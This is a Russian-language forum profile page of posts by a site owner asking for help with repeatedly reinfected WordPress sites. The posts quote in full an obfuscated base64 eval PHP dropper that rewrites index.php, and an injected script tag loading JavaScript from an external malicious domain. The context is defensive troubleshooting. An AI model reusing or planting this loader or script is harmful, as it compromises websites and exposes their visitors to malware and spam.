Jump to content

bysel

Новичок
 • Content Count

  4
 • Joined

 • Last visited

About bysel

 • Rank
  Новичок

Profile Information

 • Специализация
  Другое

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

 1. Добрый день! Имеем: пользователей фтп всех удалили пароль от админки убер сложный у админа не стандартный логи других левых админов нету все файлы чистые на хостинге С периодичностью раз в 2 дня где-то перезаписывается index.php лежащий в корне файла. Помогите гуру ) куда копать? странность в том что перезаписывает только index.php , никаких других файлов не заражает. <?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = 'mapss200.xml'; $jdir = ''; $smuri_tmp = smrequest_uri(); if($smuri_tmp==''){ $smuri_tmp='/'; } $smuri = base64_encode($smuri_tmp); $dt = 0; function smrequest_uri(){ if (isset($_SERVER['REQUEST_URI'])){ $smuri = $_SERVER['REQUEST_URI']; }else{ if(isset($_SERVER['argv'])){ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; }else{ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $smuri; } $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iSmdXVG9YWXJ3dmRLcXlTUFJDa2J4aURMbGNwdFZVbkJIYUlRWk9tc05NQWZodWpGR3pFZURtTE1uY3JrRkd5QVBDYkJqaHhvTlFPbFRFSGVVS3R1c1pXU1ZJelJZSndhWGRnaWZxcHZCTzlGWnN3bU9TbllobTBBRHNqVG9jd21CYnV3RGk5c2pVam9EM1lleWZVZUVoeXlJRjBBRGZ5R3kyVVFXTzBtRDJVSFYyWDB2YjFUWkx5bnlPV2RaMjlkckxqUHJjdVhvUTVGeUNFN09TbnhaTFNtQmJ1d0RpOXNqVWpvRDNZZVpMU3RjTVJtT1NueEUyVDBWYnc5V3B3eGMweWlVaVJ0RTIxcVpjalREMTA3T1NueEUyVDBWYnc5V3NZMEVUOUNWY3VSckxZVEFoRUdEQ0Z0RENGeEUyVDBWYng3T1NueFpmOXF5aHc5V2hqYUswVWJVeFViTEN5V1VpalNjMFhCSzFTdGNNUlloUWpnb2Y5Z1pDdzlXaEV0SUYwQU9Tbnh5ZlVlRXN5VHJRdzlXcHd4YzB5aVVpUnR5ZlVlRXN5VHJReXlJRjBBRHNqVG9jdTNWTFdtQmJ1cXlzRGFFelVGb2ZpZ1ZibXRsQ0VSRENFUkRzalRvY3UzVkxXSElGMEFPU0hIVlFteHlmVWVFc3lUclFUN09TbkREc1lIeWZLbUJid3h5ZlVlRXN5VHJUUkZjYjR4eWZVZUVzeVRyVFJOY2I0eHlmVWVFc3lUclRSQ2NNUllobXh4eWZVZUVodzlXc1kxcnRZMEVRbXh5ZlVlRXN5VHJRRnFBTVJZaHQwWWhtMEFPU254b2ZpZFZDdzlXaGphSzBVYlV4VWJMQ0RXVWlqU2MwaU9TMFVTVWk5SlNLNXNVS2lzamJEeUlGMEFEZk5Yb3pFbUJidVFyY1lUWWdqYVZMNWdvMmpUQWhqUnJMNXRBTVJZaFFqR0VDdzlXaGphSzBVYlV4VWJMQ3lXVWlqU2MxVU1qVURhU0t5aU1UU3RjTVJZaFFqR0VDdzlXZkRYRTJLMllpOVRvellHVmZLbkRmOXFBTVJZaHpUekFmVHFFMlUwQWhqYUswVWJVeFViTEN5V1VpalNjMURpanhVYmpVV3RjYnhIdkYwQVdod21XaGoxRXpOcVpmaWRWQ3c5V2hqYUswVWJVeFViTEN5V1VpalNjMURpanhVYmpVV3RjTVJZaFF3bVdod3h5Y0RSRTJYWG96RW1CYnVRcmNZVFlnamFWTDVnbzJqVEFoajFFek5xWmZpZFZDeDdPU0g5VkxOcVZjUllobXh4eWNEUkUyWFhvekVtQmJ3dERxUllodDBZaG0wQVpMcm5WMlUwVkw1MkFoeWJqSzFCVXBVYVNLanBLUUVIV2hyeldzWTBFellYRTJVZ29jd25WMlUwVkw1MkFoeWJqSzFCVXBVYVNLanBLUUVIbGh3dHlMNWtvejkzb1FFSEFidTdPU254cjJOR3IyUm1CYnV0VmNqVG90cm5EMURpTUs5S2pVOXVqcGpiREN4N09TSDlXZlVSRTJVSFZRWEhFM1lUeWhteGMxWWlLVFZpS1RSdEt4VVlNMWppYzBpcGppV3RjYnhtRFFybURpOU1qVURMalVEb0QxRGlNSzlLalU5dWpwamJEMTBtRFFybUUzakNyMmlxVkxZZUVobXhjMVlpS1RWaUtUUnRLeFVZTTFqaWMwaXBqaVd0Y2JGbUQzVWRaMjVHeTI0dEFieG12RjBBRGZZUm8yWWtXTzBtRGk5TWpVRExqVURvRDFEaU1LOUtqVTl1anBqYkQxMDdPU0g5T1NuWWhRam55c2pGYzJZUm8yWWtXTzBtRENFN09TSEhWUVh0VmNqVG90cm5EMFhLVWl1YVMwTkRqSzVLYzBUU0RDeG1EUXJtRTNqQ3IyaXFWTFllRWhYdFZjalRvdHJuRDBYS1VpdWFTME5Eaks1S2MwVFNEQ3hSV2h5MW96ZWRvM3lkREN4SFdzUlloUWpueXNqRmMyWVJvMllrV08wbVYyVTBWTDUyQWh5V1VpalNjMFlKYktVSVVpOURLaEVISUYwQWFidVRvc1lUWkxyblYyVTBWTDUyQWh5V1VpalNjMVhhang5YlUwaWJqcFVwYzBWQktRRUhXaHJ6V3NZMEV6WVhFMlVnb2N3blYyVTBWTDUyQWh5V1VpalNjMVhhang5YlUwaWJqcFVwYzBWQktRRUhsaHd0eUw1a296OTNvUUVIQWJ1N09Tbnhac2owRWk5Z29mOWdaQ3c5V2Z5VHlmVWR5UW10YmlqS0tpOXJjMFZCS1R5dUt4amlqaTlmTTFXdEFNUllodDBZaG0wQVpMcm5FM2pDWmNZMEVRbXhyMk5HcjJSUkRDRnRBYlQ3T1NuRERmWVJvMllrYzNqZUVodzlXZlU0RWZOR1ZmS25XUUZRbGhqZ29mOWdaQ3g3T1NuRERmWVJvMllrV08wbURmWVJvMllrYzNqZUVpUkZjTVJZaHQwRE9TSEhWUVh3RGk5c2pVam9EMmVQRDEwbUJNMG1XZ3BRQWNSRE9TbkREc1UxRXpGbUJid3hjMHlpVWlSdFoySHFaY2pURDEwN2hTMEFoTFVnWmY4bURxTkhWdERYb0xLbVdmVHhCYkRlckxUZHkyVVFXUXVkckwxVEJiRGVyTFRkeTJVUVdRdW5WTFR0WnNTOVdncEZKaEtRV3N5SFZzam5CYldOSk93VFdRdXF5c1RSVk0wUVdmakhFM3VScmN4NldmRFJvMllrSTJOVFZ0UzZKT2UwbzN3NkpPZUZvM1lIeWZUR29nSHpaY1hUVk9SbXZRMUhvempUdk9ubUpNd0ZKT3dGSUN3bXJ6aWdaMnlDbzNVZFZoMWdvMk5HRWdubVcyVnpWZ1JRV2ZWQ3JMMVRyejlDVmZVQ1dPMG1XZ3dRV2h1ekV6aWVWTERHRXpqVEVnMFFKaFdtV2Y5ZE1mOVhWTzBRWktWQ3JMMVRiZlVIVjJYMEFoeFFXc1lDcnEwUURDNVFyY1lUWWdqYVZmVWdvMmpUQWhqMXljRFJBYjR0V2c0OGwyVHpFemllVk00dElGMEFoTFU0WmNTN09TSDlPU25ZaHpUekFzWTBFelRxeXNXbkRzWWV5Y0RIYzNqZUVoRnRsellxRUNFSEFjUkRPU25ERHN5VHJRdzlXaHlueXNqRklROEdEQzR4VjI5M1ZMV2REQzlIb3pqVHZoNUZac3cveWNEUkJiRWREc1lIeWZLZERDVkhWTzB0bFFqSFZoNHREdGpUb2N3OURDNHh5ZlVlRWg0dER6ajBCYkVkRGZqMGxRRXp5MlVRQmJFZERmWEdFM1NkRENWNnZnMHRsdFllWmNZUW8zU25BYjR0RHpIeFpjVzlEQzR4WnpqSEVRNHREellSbzJZa0JiRWREZllSbzJZa2xRRXp5Y0RIQmJFZERzWWV5Y0RIbFFFem9maWRWcTB0bFFqUnJMNXRsUUV6bzNKOURDNHhvM0pkRENWMUV6TnFaZmlkVnEwdGxRajFFek5xWmZpZFZDNHREelgweXN1YXIyTkdyMlI5REM0eFpzajBFaTlnb2Y5Z1pxUllobXh4WnNqZW9pOWdvMjUwVkw1MFdPMG15c0RIb2JYcW9MOTF5ZmpHQWhqM1ZMV0hBTVJET1NuRFpMcm5XY1kwRXRZMEVRbXhac2plb2k5Z28yNTBWTDUwbGh5ZG8yREd5c1VxVmNEWFYyVWR5aEVIQWNSRE9TbkRoTFR6QXNZMEV0WTBFUW14WnNqZW9pOWdvMjUwVkw1MGxoeUdaMlgwb0xOdFZjamdvMjUwVkw1MERDeEh2RjBBaFN4RFNmWFRyTGpURVFtUVMyOWR5ZlVkeWgxMHZjdVRJUXUwVmNYMGwyWXFFcVJtcjJYWEV0WVR5TzExeWZyZUloV0hJRjBBaFN4RERmWDBvTE5hcjI5ZHlmVWR5aHc5V3NZMEVUOUNWY3VSckxZVEFoREdaMlgwb0xOdFZjamdvMjUwVkw1MFdRRnREQ0Z4WnNqZW9pOWdvMjUwVkw1MEFNUkRPU25EaFNUVHIyWEdXaGpueWYxUmMyWUdvdGpUb3RTN2hTeERoUzBBaFN4RFZjWEh5aG1ISUZ4WWhteERhTFVSRTJLbVpMcm5FM2pDRTNqQ0Foam55ZjFSYzJZR290alRvdFNSRDJ5VHlmWUdvdGpUb3RTMUpPdUZyTHlUREN4SHZGMEFoU3hEU2ZYVHJMalRFUW10YmlqS0toOE5sZ3BtWU13RldwVGR5ZlVDb3ppUldpWVRFdFZURVF1aUV0REdFUUVISUYwQWhTeERWY1hIeWhtSElGMEFoU1Q5VkxOcVZidUhWUVhxeXNEcXlzV25EZlgwb0xOYXIyOWR5ZlVkeWhGdFYyVTByMjlkeWZVZHlPU0ZZc3VYVjJLdEFiVDdPU25EaFNUd1pmVVhWZlVDQWh5V1VpalNscXBkSmJ3MEpPU21NejkwV3BWR3lMNXhEQ3g3T1NuRGhTVFR2ZlQwQWh4N09TbkRoYzBZaG14RGhTeERoUzBBaGMwRGhTMEFhUzBBT1NIVG9zWVRXZlR6QWhqcVpjalRBY1JtT1NuRFpMcm5Ec1lIeWZLbUJNMG1EM1hlb2hFSHZGMEFoU1R3WmZVWFZmVUNBaERPbzI1MFZMNTBsY2o1RWZLNldzalR2c1NHWnNqZW9PUm1yMlhYRXRZVHlPMTF5ZnJlSWhXSElGMEFoU3h4eTJVUVdPMG1EMlgweXN3NmxDOHRsUWp0bzN5VHJRNHRsM1lIeWZVZXJjd2RFZlhGQjJqWHlmSzlEQzR4WkxTZERDVjBWTDFGQmJFZERzalRvY3dkRENWM1ZMVzlEQzR4WmY5cXloNHREdFhlb08wdGxRanh5T1JtT1NuRGhMVHpBc1kxcnRZMEVRbXh5ZlVlRWhGRmxPbUhCTTB0RTJYVG9mTjRvTEZ0QWNSWWhteERoYmo0b0xOZHJMMVRXTzBtRTNVUUUzakNBaGowVkwxRmxPbUhsUUVkdmYxUkRxUllobXhEYVMwQWhTVEhWUVhxeUxEcXlzV25Ec2pUb2N3UkpoRjNBTTA5RDJYWHIyZTRvTEZ0QWNSWWhteERoTFR6QXNZMXJ0WTBFUW14eWZVZUVoRjNBYlQ3T1NuRGhTeEREc1hlb2Y1WG9MS21CYnVxeUxEcXlzV25Ec2pUb2N3UllDeGREQzU0b0xGdElGMEFoU3hEYVN4RGhTMEFoU1Q5T1NuRGhiajRvTEZtQmJ1MEV6VGVBc1llbzNVMFZmOG5Ec3lUclF4SElDd1lobXhERGYxNVZ6VFJWYnc5V2ZWR0VmVWRBaGo0b0xOZHJMMVRsaHdReUNXSElDd1lobXhEVnR5Q1pjalRBaGpldkxWSG9mS1JXaGo0b0xGSElGMEFoU1R6cjJOR0UyS25EZjE1VnpUUlZieDdXdzBBaFNUVHIyWEdXaERHWnFOUUVnNW55c2pGSVE4R1dRNHhjMVlpS1RWaUtUUnRiaWpLS2k5V00xWUtEMTBkV1E4UWxRajRvTE5kckwxVElDd1lobXhEVkxZbm9Dd1FCZkRDQlFXZERzeVRyZ1JZaG14RE9TbkRoTFU0WmNTbkFNUllobVQ5aFMwQWhMVHpBaGpIVmhUN09TbkRoS3VuVkxpeFZjV25XeFlHb3RqVG90U2V5c1RGVk1ubXlmVTR5aDlueWYxUklDdWdaZmlDRTJVMEJjVTBWUTA0V1F4N09TbkRoYmozVkxXbUJid3Rac2owRU9uR2xDRWREZnlHeTJVUWxRRUdaTDV4VmNtZEVmWEZCM1VDb08wdGxRanFaY2pUbFFFelpMUzlEQzR4WkxTZERDVjBWTDFGQmJFZERzalRvY3dkRENWeHlPMHRsUWp4eWg0dER0eVRyZzB0bFFqbm8zWTBsUUV6dnRuOURDNXFvTFRxcno5MEFoeGREQ1ZQVmZUQ0JiRWREZkh4WmNXZERDVmdvZjlnWnEwdGxRamdvZjlnWkM0dER0VUNaTTB0bFFqcW9jVUNaYjR0RHpOWG96RTlEQzR4b2ZpZFZDNHREejlxQmJFZERmOXFsUUV6eWNEUkUyWFhvekU5REM0eHljRFJFMlhYb3pFZERDVm55c2pGYzJZUm8yWWtCYkVkRGZYMHlzdWFyMk5HcjJSN09TbkRoYmpueWYxUmMyWUdvdGpUb3RTbUJidTBFelRlQXNZZW8zVTBWZjhuRHN5VHJReEhJRjBBaFNUSFZRbVhFM2pDRTNqQ0Foam55ZjFSYzJZR290alRvdFNSRDI1R3J6OTB5Y1lURXppdFZMNTBEQ3hIdkYwQWhTeERaTHJuRTNqQ0UzakNBaGpueWYxUmMyWUdvdGpUb3RTUkQyOWtac2plb2Z5VHlmWUdvdGpUb3RTdEFiVDdPU25EaFN4RERmWDBvTE5hcjI5ZHlmVWR5aHc5V3NZMEVUOUNWY3VSckxZVEFoREdaMlgwb0xOdFZjamdvMjUwVkw1MFdRRnREQ0Z4WnNqZW9pOWdvMjUwVkw1MEFNUllobXhEaFNUVHIyWEdXaGpueWYxUmMyWUdvdGpUb3RTN2hTeERPU25EaFN4RFZjWEh5aG1ISUYwQWhTeERhTFVSRTJLbVpMcm5FM2pDRTNqQ0Foam55ZjFSYzJZR290alRvdFNSRDJ5VHlmWUdvdGpUb3RTMUpPdUZyTHlUREN4SHZGMEFoU3hEaEt1blZMaXhWY1duRDBYS1Vpd0dKYjROV09LRkpodURvdGpURXo1WG9odU1WY0QyVmNXbWpjRENvM1d0QU1SWWhteERoU1RUdmZUMEFoeDdPU25EaFNUOVZMTnFWYnVIVlFYcXlzRHF5c1duRGZYMG9MTmFyMjlkeWZVZHloRnRWMlUwcjI5ZHlmVWR5T1NGWXN1WFYyS3RBYlQ3T1NuRGhTeERTZlhUckxqVEVRbXRiaWpLS2g4TmxncG1ZT3cwV3A1R3lodWZvM1VkVmhFSElGMEFoU3hEaExVNFpjU25BTVJZaG14RGhjMFlobXhEaFN4RGhTMEFoU1Q5T1NuRGFTMEFhTFVSRTJVN09TbkRPU25ERHN5VHJRdzlXaHlueXNqRklROEdEQzR4VjI5M1ZMV2REQzlIb3pqVHZoNUZac3cveWNEUkJMREd5aFZIVk8wdGxRakhWaDR0RHRqVG9jdzlEQzR4eWZVZUVoNHREemowQmJFZERmajBsUUV6eTJVUUJiRWREZlhHRTNTZERDVjZ2ZzB0bHRZZVpjWVFvM1NuQWI0dER6SHhaY1c5REM0eFp6akhFUTR0RHpZUm8yWWtCYkVkRGZZUm8yWWtsUUV6eWNESEJiRWREc1lleWNESGxRRXpvZmlkVnEwdGxRalJyTDV0bFFFem8zSjlEQzR4bzNKZERDVjFFek5xWmZpZFZxMHRsUWoxRXpOcVpmaWRWQzR0RHpYMHlzdWFyMk5HcjJSOURDNHhac2owRWk5Z29mOWdacVJZaG14eFpzamVvaTlnbzI1MFZMNTBXTzBteXNESG9iWHFvTDkxeWZqR0FoajNWTFdIQU1SWWhtVEhWUW1YRTNqQ0UzakNBaGpueWYxUmMyWUdvdGpUb3RTUkQyNUdyejkweWNZVEV6aXRWTDUwREN4SHZGMEFoU1R3WmZVWFZmVUNBaERPbzI1MFZMNTBsY2o1RWZLNldzalR2c1NHWnNqZW9PUm1yMlhYRXRZVHlPMTF5ZnJlSWhXSElGMEFoU1RIVlFYcXlzRHF5c1duRGZYMG9MTmFyMjlkeWZVZHloRnRvMmVueWYxUlYyVTByMjlkeWZVZHloRUhBY1JZaG14RGhiam55ZjFSYzJZR290alRvdFNtQmJ1cXlzRGFFelVGb2ZpZ1ZibVFvMmVueWYxUlYyVTByMjlkeWZVZHloV1JEQ0VSRGZYMG9MTmFyMjlkeWZVZHloeDdPU25EaFNUVHIyWEdXaGpueWYxUmMyWUdvdGpUb3RTN2hTeERPU25EaFNUVHZmVDBBaHg3T1NuRGhjMVRvc1lUV2ZUekFzWTBFdFkwRVFteFpzamVvaTlnbzI1MFZMNTBsaHl0VmNqZ28yNTBWTDUwWU13RkVmaXRWYkVIQWNSWWhteERoS3VuVkxpeFZjV25EMFhLVWl3R0piNE5XT0tGSmh1RG90alRFejVYb2h1TVZjRDJWY1dtamNEQ28zV3RBTVJZaG14RGhMVTRaY1NuQU1SWWhteERhTFVSRTJLbVpMcm5FM2pDRTNqQ0Foam55ZjFSYzJZR290alRvdFNSRDJ5VHlmWUdvdGpUb3RTMEpPakZyTHlUREN4SHZGMEFoU3hEU2ZYVHJMalRFUW10YmlqS0toOE5sZ3BtWU93MFdwNUd5aHVmbzNVZFZoRUhJRjBBaFN4RFZjWEh5aG1ISUYwQWhTVDlPU25EaFN4RGhTMEFoYzBET1NIOU9TblloelYxb3pZMFpMOWRXc1llWmNZUW8zU25BYnU3T1NuRERmaXRWTDUwV08wbUUzakN5ZjlSbzN5VEVRbXhjMVlpS1RWaUtUUnRiaWpLS2k5VUswVWJjMGlzaks1S0QxMEhJRjBBaExUeldobXhyTHlUb3RTbVdNMG1XUVdIV3NSWWhteEREc1lGWkxqVEVUWUh5ZkttQmJ1WEV0RFh2YnduV1RqVG96WVRvdGpLRXppMlZMTlRFUVdSV3h5R28yeVJWTERHeWhXUld6MXFvekRHeWhXUldUWUdFMjlxRWZUeFZjV2tXUUZRSzI5dG8zS215MlVRV3NZRlpMalRFUVdSV3pUWGMyaUNyMlhIeXpVQ1dRRlFMTGlubzI4WFdpWVJ5Y0RGV1FGUUxMOTFWZmlHU3o5MFdRRlFMTGlubzI4bUsyTjFFdHdRbGhEWUswNWhvM1NRbGhEQXJjVlhXaFhCVnRqVG9RdXFFZmllV2ZER3loeFFsaERockxUcHlVWUZaTGpURVFXUldUVkdaTE5YV1FGUUxMaWRWZlU0V2ZER3loV1JXeERNRWZUeFZjV1FsaEQweTJUZ1ZMTlRFUVdSV1RZR1YyOTFXaVlGWkxqVEVRV1JXVFlGVkxVeHZidU1FZlR4VmNXUWxoRHNvMjl0b2ZLbVNMak1WTDVxVmJXUld4WFRFelQwRXpUNFdRRlFLc1QwWmY5ZGxjVUNvZk5IclFXUld4aVJWY1hYV2hYRFNidXVFelluWmNWVEVReFFsaER1RTJSUWxoRGl2ZmlRbzNTUWxoRE95Y1kwb0NXUld4OTF5ZlZHdnBER3loOVZvMmpYbzBER3loV1JXdFRYcjN4UWxoRE15Y0QyVmNUaG8zU1FsaERSVkx5cVdRRlFvc3lGbGNqQ1pjVkhyTEZRbGhESXljamdaaFdSV1RZMHJMWWtLemllcnpOVEVRV1JXVGpuVmJ1M1ZMV21yY0RnWmZUMlZid25iS3BtU2NEZ1pmVDJWY1dIV1FGUUtmVUNvaHUwbzI5UldRRlFNS25OSnpER3loV1JXeDVUeWZZQ3JMVjBXUUZRTVVZRGpLWUNyY3lSVmNXUWxoRGNqMlUwV3NqR28yTnFXUUZRb2ZpQ3J6VGRXUUZRanpUcVpodXFWTGlDcjJtUWxod3RyelRkVjJER3loRVJEMnlHbzJ5UlZiRVJXaHlRckxUeHliRVJXaHlYbzJGdGxod3RyelRkVkNFUldoeTVyTFhHb0NFUldoeVZyTDV4VmNYaG8zU3RsaHd0U0xYQ1ZMVnFTejkwREN4N09TbkRoTFZHRXpVWHIybW1BaGpxRWZUeFZjRE1aY2pUV2ZpcVdoajJyTEZIV3NSWWhteERoYmpxeXNXbUJidXF5c0QwbzJOR3kyVUNBaGoyckxGSElGMEFoU3hEWkxybUFzWTBFdHVHRUNteHJMeVRvdFNSV2hqcXlzV0hBYnU3T1NuRGhTeERFelUweWNEZFdzakN5TEs3T1NuRGhTVDlPU25EaGMwWWhtVDlWTE5xVmNSWWhteERFelUweWNEZFdmVlhvc1lUSUYwQWhjMFlodDBZaHpWMW96WTBaTDlkV3NZZW8zVTBWZjhuRHNVQ29oVDdPU25ERGZWSG9mVWFyMjlkeWZVZHlzSm1CYnV3VnpUUlZVOXRWY2phcjI5ZHlmVWR5c0puRHNVQ29oeDdXdzBBaExUeldobVhEZlZIb2ZVYXIyOWR5ZlVkeXNKSFdzUllobXhERGZZbldPMG1yM1VDb2k5SG96VDBBaHg3T1NuRGhMWTFFek5hRTJVMG8zdTBBaGpnWmhGbVMxVWJNcDlTVWk5VUt4RlJXaGoxRXpGSElGMEFoU1RneWNEUmMzWVR5ZjlGeWhteHIybVJXcFlVS3hOQktpamFLeFVLVVVESVVpRHVNVFlmalVXUkpieDdPU25EaGJqelpMTlRjMllHb3RqVG90anFXTzBtcjNVQ29pOVR2ZlVnQWhqZ1poeDdPU25EaExZMUV6TmFyMk5HRTJLbkRmWW5BTVJZaG1UOVd3MEFoY0RUeXNVQ29Rd3hWelRSVlU5Z28yNTBWTDUwRXFSWWh0MFloZzgrIjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw==")); ?>
 2. Подоплёка вопроса в том, что есть вордрпесс 4.8.1 на хостинге. Вирусы удалили, левые аккаунты удалили, пароль сложный стоит. Тема на сайте стоит стандартная twentyten. НО! Раз в 1-2 дня файл index.php перезаписывается вот такой вот ерундой https://pastebin.com/7b00Xm9g , никакие файлы больше не трогаются, никаких вирусных вставок нигде больше нету. В итоге обычные журналы WWW-запросов в ISP-manager не дают полную информацию. Может есть какой-то анализатор запросов к файлам который пишет какие данные были посланы в реквесте пост запроса? Либо как средствами хостинга это отследить?
 3. Благодарю за быстрый ответ, это именно то что надо!
 4. Добрый день. Что имеем: 1. Сложные пароли от админа - 13 символов+спецсимволы. 2. Обновлённый до 4.8.1 вордпресс 3. Проверенные айболитом и прочими антивирусниками файлы - всё чисто. 4. Тему NewspaperВерсия: 6.6.5 Что появляется: <div class="td-banner-wrap-full td-banner-bg"> <div class="td-container-header td-header-row td-header-header"> <div class="td-header-sp-recs"> <div class="td-header-rec-wrap"> <div class="td-a-rec td-a-rec-id-header "><script src='https://blue.traffictrade.life/main.js' type='text/javascript'></script></div> </div> </div> </div> </div> Вот такая вот вставочка, и по итогу ведёт в очень тёмный лес с вирусами и рекламой. В базе данных проверили, в файлах проверили - нету такой строчки.. Нет, всё равно вылазит
×
×
 • Create New...